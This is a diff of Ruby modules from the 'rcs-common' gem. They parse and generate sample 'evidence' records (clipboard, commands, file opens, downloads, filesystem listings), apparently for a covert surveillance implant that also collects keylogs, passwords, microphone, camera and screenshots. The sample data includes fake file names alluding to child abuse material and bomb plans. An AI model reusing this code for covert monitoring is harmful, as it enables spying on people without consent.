rcs-common 9.6.0

data/lib/rcs-common/evidence/clibpoard.rb

@@ -0,0 +1,58 @@
+require 'rcs-common/evidence/common'
+
+module RCS
+
+module ClipboardEvidence
+
+  ELEM_DELIMITER = 0xABADC0DE
+
+  def content
+    process = ["Notepad.exe", "Sykpe.exe", "Writepad.exe"].sample.to_utf16le_binary_null
+    window = ["New Document", "Chat", "Test.doc"].sample.to_utf16le_binary_null
+    content = StringIO.new
+    t = Time.now.getutc
+    content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
+    content.write process
+    content.write window
+    content.write ["1234567890", "bla bla bla", "this is a string that will be copied"].sample.to_utf16le_binary_null
+    content.write [ ELEM_DELIMITER ].pack('L')
+
+    content.string
+  end
+  
+  def generate_content
+    ret = Array.new
+    10.rand_times { ret << content() }
+    ret
+  end
+  
+  def decode_content(common_info, chunks)
+    stream = StringIO.new chunks.join
+
+    until stream.eof?
+      info = Hash[common_info]
+      info[:data] = Hash.new if info[:data].nil?
+
+      tm = stream.read 36
+      info[:da] = Time.gm(*tm.unpack('L*'), 0)
+      info[:data][:program] = ''
+      info[:data][:window] = ''
+      info[:data][:content] = ''
+
+      process = stream.read_utf16le_string
+      info[:data][:program] = process.utf16le_to_utf8 unless process.nil?
+      window = stream.read_utf16le_string
+      info[:data][:window] = window.utf16le_to_utf8 unless window.nil?
+      clipboard = stream.read_utf16le_string
+      info[:data][:content] = clipboard.utf16le_to_utf8 unless clipboard.nil?
+
+      delim = stream.read(4).unpack("L*").first
+      raise EvidenceDeserializeError.new("Malformed CLIPBOARD (missing delimiter)") unless delim == ELEM_DELIMITER
+
+      yield info if block_given?
+    end
+    :delete_raw
+  end
+end
+
+end # ::RCS

data/lib/rcs-common/evidence/command.rb

@@ -0,0 +1,50 @@
+require 'rcs-common/evidence/common'
+
+module RCS
+
+  module CommandEvidence
+
+    def content
+
+      raise "this evidence cannot be generated here"
+
+      # it is partiallly encrypted and partially not
+
+    end
+
+    def generate_content
+      [ content ]
+    end
+
+    def decode_additional_header(data)
+      raise EvidenceDeserializeError.new("incomplete COMMAND") if data.nil? or data.bytesize == 0
+
+      ret = Hash.new
+      ret[:data] = Hash.new
+
+      binary = StringIO.new data
+      ret[:data][:command] = binary.read_ascii_string
+
+      ret
+    end
+
+    def decode_content(common_info, chunks)
+      stream = StringIO.new chunks.join
+
+      output = stream.read
+
+      info = Hash[common_info]
+
+      info[:grid_content] = output unless output.nil?
+
+      info[:data] ||= Hash.new
+      info[:data][:content] = output.safe_utf8_encode_invalid unless output.nil?
+      info[:data][:content] ||= ''
+
+      yield info if block_given?
+
+      :delete_raw
+    end
+  end
+
+end # ::RCS

data/lib/rcs-common/evidence/common.rb

@@ -0,0 +1,78 @@
+
+require 'rcs-common'
+
+module RCS
+
+EVIDENCE_TYPES = { 0x0240 => :DEVICE,
+                   0xFFF1 => :DEVICE,       # for scout
+                   0x0140 => :CALL,
+                   0x0230 => :CALLLISTOLD,
+                   0x0231 => :CALLLIST,
+                   0xC2C2 => :MIC,
+                   0x0241 => :INFO,
+                   0xB9B9 => :SCREENSHOT,
+                   0xFFF2 => :SCREENSHOT,   # for scout
+                   0x0040 => :KEYLOG,
+                   0xE9E9 => :CAMERA,
+                   0xC6C6 => :CHATOLD,
+                   0xC6C7 => :CHAT,
+                   0xC6C8 => :CHAT,        # skype (new)
+                   0xC6C9 => :CHATMM,      # chat multi media
+                   0x0300 => :CHATOLD,     # skype (old)
+                   0x0301 => :CHATOLD,     # social
+                   0x0280 => :MOUSE,
+                   0x0100 => :PRINT,
+                   0x0180 => :URL,
+                   0x0181 => :URLCAPTURE,
+                   0xD9D9 => :CLIPBOARD,
+                   0xFAFA => :PASSWORD,
+                   0x0000 => :FILEOPEN,    #file
+                   0x0001 => :FILECAP,     #file
+                   0x1011 => :APPLICATION,
+                   0xD0D0 => :DOWNLOAD,    #file
+                   0x1220 => :POSITION,
+                   0xEDA1 => :FILESYSTEM,  
+                   0x1001 => :MAIL,
+                   0x0211 => :SMSOLD,
+                   0x0213 => :SMS,
+                   0x0212 => :MMS,         #message
+                   0x0200 => :ADDRESSBOOK,
+                   0x0250 => :IADDRESSBOOK,
+                   0x0201 => :CALENDAR,
+                   0x0202 => :TASK,
+                   0xc0c0 => :COMMAND,
+                   0xc0c1 => :EXEC,
+                   0xB1C0 => :MONEY,
+                   0xF070 => :PHOTO}
+
+class EvidenceDeserializeError < StandardError
+  attr_reader :msg
+  
+  def initialize(msg)
+    @msg = msg
+  end
+  
+  def to_s
+    @msg
+  end
+end
+
+class EmptyEvidenceError < StandardError
+  attr_reader :msg
+
+  def initialize(msg)
+    @msg = msg
+  end
+
+  def to_s
+    @msg
+  end
+end
+
+end # RCS::
+
+class Integer
+  def rand_times(&block)
+    (rand(self-1)+1).times { yield }
+  end
+end

data/lib/rcs-common/evidence/device.rb

@@ -0,0 +1,23 @@
+require 'rcs-common/evidence/common'
+
+module RCS
+
+module DeviceEvidence
+  def content
+    "The time is #{Time.now} and everything is ok... till now".to_utf16le_binary
+  end
+
+  def generate_content
+    [ content ]
+  end
+
+  def decode_content(common_info, chunks)
+    info = Hash[common_info]
+    info[:data] = Hash.new if info[:data].nil?
+    info[:data][:content] = chunks.join.utf16le_to_utf8
+    yield info if block_given?
+    :delete_raw
+  end
+end
+
+end # RCS::

data/lib/rcs-common/evidence/download.rb

@@ -0,0 +1,54 @@
+require 'rcs-common/evidence/common'
+
+require 'digest/md5'
+
+module RCS
+
+module DownloadEvidence
+
+  FILECAP_VERSION = 2008122901
+
+  def content
+    path = File.join(File.dirname(__FILE__), 'content', ['screenshot', 'print', 'camera', 'mouse', 'url'].sample, '001.jpg')
+    File.open(path, 'rb') {|f| f.read }
+  end
+
+  def generate_content
+    [ content ]
+  end
+
+  def additional_header
+    file_name = 'C:\\Users\\Bad Guy\\filedownload...'.to_utf16le_binary
+    header = StringIO.new
+    header.write [FILECAP_VERSION, file_name.size].pack("I*")
+    header.write file_name
+    
+    header.string
+  end
+
+  def decode_additional_header(data)
+    raise EvidenceDeserializeError.new("incomplete DOWNLOAD") if data.nil? or data.bytesize == 0
+
+    binary = StringIO.new data
+
+    version, file_name_len = binary.read(8).unpack("I*")
+    raise EvidenceDeserializeError.new("invalid log version for DOWNLOAD") unless version == FILECAP_VERSION
+
+    ret = Hash.new
+    ret[:data] = Hash.new
+    ret[:data][:path] = binary.read(file_name_len).utf16le_to_utf8
+    return ret
+  end
+
+  def decode_content(common_info, chunks)
+    info = Hash[common_info]
+    info[:data] = Hash.new if info[:data].nil?
+    info[:data][:type] = :capture
+    info[:grid_content] = chunks.join
+    info[:data][:size] = info[:grid_content].bytesize
+    yield info if block_given?
+    :delete_raw
+  end
+end
+
+end # ::RCS

data/lib/rcs-common/evidence/file.rb

@@ -0,0 +1,129 @@
+require 'rcs-common/evidence/common'
+
+require 'digest/md5'
+
+module RCS
+
+module FileopenEvidence
+
+  ELEM_DELIMITER = 0xABADC0DE
+
+  def content(*args)
+    hash = [args].flatten.first || {}
+
+    process = hash[:process] || ["Explorer.exe\0", "Firefox.exe\0", "Chrome.exe\0"].sample
+    process.encode!("US-ASCII")
+
+    path = hash[:path] || ["C:\\Utenti\\pippo\\pedoporno.mpg", "C:\\Utenti\\pluto\\Documenti\\childporn.avi", "C:\\secrets\\bomb_blueprints.pdf"].sample
+    path = path.to_utf16le_binary_null
+
+    content = StringIO.new
+    t = Time.now.getutc
+    content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
+    content.write process
+    content.write [ 0 ].pack('L') # size hi
+    content.write [ hash[:size] || 123456789 ].pack('L') # size lo
+    content.write [ 0x80000000 ].pack('l') # access mode
+    content.write path
+    content.write [ ELEM_DELIMITER ].pack('L')
+    content.string
+  end
+
+  def generate_content(*args)
+    [content(*args)]
+  end
+
+  def decode_content(common_info, chunks)
+    stream = StringIO.new chunks.join
+
+    until stream.eof?
+      info = Hash[common_info]
+      info[:data] = Hash.new
+      info[:data][:type] = :open
+
+      tm = stream.read 36
+      info[:da] = Time.gm(*tm.unpack('l*'), 0)
+      info[:data][:program] = ''
+      info[:data][:path] = ''
+
+      process_name = stream.read_ascii_string
+      info[:data][:program] = process_name.force_encoding('US-ASCII') unless process_name.nil?
+
+      size_hi = stream.read(4).unpack("L").first
+      size_lo = stream.read(4).unpack("L").first
+      info[:data][:size] = size_hi << 32 | size_lo
+      info[:data][:access] = stream.read(4).unpack("l").first
+
+      file = stream.read_utf16le_string
+      info[:data][:path] = file.utf16le_to_utf8 unless file.nil?
+      
+      delim = stream.read(4).unpack("L*").first
+      raise EvidenceDeserializeError.new("Malformed FILEOPEN (missing delimiter)") unless delim == ELEM_DELIMITER
+
+      yield info if block_given?
+    end
+    :delete_raw
+  end
+end
+
+module FilecapEvidence
+
+  FILECAP_VERSION = 2008122901
+
+  def content(*args)
+    bytes = [args].flatten.first || nil
+
+    if bytes
+      bytes
+    else
+      path = File.join(File.dirname(__FILE__), 'content', ['file'].sample, @file)
+      File.open(path, 'rb') {|f| f.read }
+    end
+  end
+
+  def generate_content(*args)
+    [ content(*args) ]
+  end
+
+  def additional_header(*args)
+    hash = [args].flatten.first || {}
+
+    path = hash[:path] || ["C:\\Documents\\Einstein.docx", "C:\\Documents\\arabic.docx"].sample
+    @file = path[path.rindex(/\\|\//)+1..-1]
+
+    path = path.to_utf16le_binary_null
+
+    header = StringIO.new
+    header.write [FILECAP_VERSION, path.size].pack("I*")
+    header.write path
+
+    header.string
+  end
+
+  def decode_additional_header(data)
+    raise EvidenceDeserializeError.new("incomplete FILECAP") if data.nil? or data.bytesize == 0
+
+    binary = StringIO.new data
+
+    version, file_name_len = binary.read(8).unpack("I*")
+    raise EvidenceDeserializeError.new("invalid log version for FILECAP") unless version == FILECAP_VERSION
+
+    ret = Hash.new
+    ret[:data] = Hash.new
+    ret[:data][:path] = binary.read(file_name_len).utf16le_to_utf8
+    return ret
+  end
+
+  def decode_content(common_info, chunks)
+    info = Hash[common_info]
+    info[:data] = Hash.new if info[:data].nil?
+    info[:data][:type] = :capture
+    info[:grid_content] = chunks.join
+    info[:data][:size] = info[:grid_content].bytesize
+    info[:data][:md5] = Digest::MD5.hexdigest info[:grid_content]
+    yield info if block_given?
+    :delete_raw
+  end
+end
+
+end # ::RCS

data/lib/rcs-common/evidence/filesystem.rb

@@ -0,0 +1,71 @@
+require 'rcs-common/evidence/common'
+
+module RCS
+
+module FilesystemEvidence
+
+  FILESYSTEM_VERSION = 2010031501
+  FILESYSTEM_IS_FILE      = 0
+	FILESYSTEM_IS_DIRECTORY = 1
+	FILESYSTEM_IS_EMPTY     = 2
+
+  def content(*args)
+    sequence = if args.empty?
+      [{path: '/', attr: 1}, {path: '/usr', attr: 1}, {path: '/usr/README', attr: 0, size: 12}]
+    else
+      [args].flatten
+    end
+
+    content = StringIO.new
+
+    sequence.each do |data|
+      path = data[:path].gsub("//", "/").to_utf16le_binary_null
+      content.write [FILESYSTEM_VERSION, path.bytesize, data[:attr], (data[:size] || 0), 0].pack("I*")
+      time = Time.now.getutc.to_filetime
+      content.write time.pack('L*')
+      content.write path
+    end
+
+    content.string
+  end
+
+  def generate_content(*args)
+    [content(*args)]
+  end
+
+  def decode_content(common_info, chunks)
+    stream = StringIO.new chunks.join
+
+    entries = []
+
+    until stream.eof?
+      version, path_len, attribute, size_lo, size_hi = stream.read(20).unpack("L*")
+      raise EvidenceDeserializeError.new("invalid log version for FILESYSTEM [#{version} != #{FILESYSTEM_VERSION}]") unless version == FILESYSTEM_VERSION
+
+      entry = {}
+      entry[:size] = Float((size_hi << 32) | size_lo)
+      entry[:attr] = attribute
+      low_time, high_time = *stream.read(8).unpack('L*')
+      entry[:da] = Time.from_filetime(high_time, low_time)
+
+      path = stream.read(path_len).terminate_utf16le
+
+      if path
+        entry[:path] = path.utf16le_to_utf8.gsub("\\\\", "\\")
+        entries << entry
+      end
+    end
+
+    if block_given? and entries.any?
+      info = Hash[common_info]
+      info[:data] ||= Hash.new
+      info[:data][:entries] = entries
+
+      yield(info)
+    end
+
+    :delete_raw
+  end
+end
+
+end # ::RCS